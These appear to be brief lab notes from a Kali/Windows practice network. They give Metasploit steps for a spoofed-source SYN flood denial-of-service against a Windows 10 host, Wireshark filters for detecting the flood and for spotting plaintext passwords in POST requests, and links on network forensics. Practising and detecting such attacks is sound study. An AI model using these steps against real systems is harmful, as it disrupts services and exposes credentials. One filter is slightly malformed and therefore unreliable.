`KALI IP = 10.10.10.11 `
`Windows 10 = 10.10.10.10 `
`Windows server 2016 =  10.10.10.16`
`Windows 8 = 10.10.10.8`
1) Open msfconsole 
2) use auxilliary/dos/tcp/synflood
3) set rhost (victom IP win10  ) , rport , shost (spoofable host  win server 2016  ) , set timeout 
4) To find DOS (SYN and ACK) : tcp.flags.syn == 1 , tcp.flags.syn == 1 and tcp.flags.ack = 0

5) To find passwords : http.request.method == POST


https://www.comparitech.com/net-admin/wireshark-cheat-sheet/
https://www.hackers-arise.com/post/2018/09/27/network-forensics-part-2-detecting-and-analyzing-a-scada-dos-attack
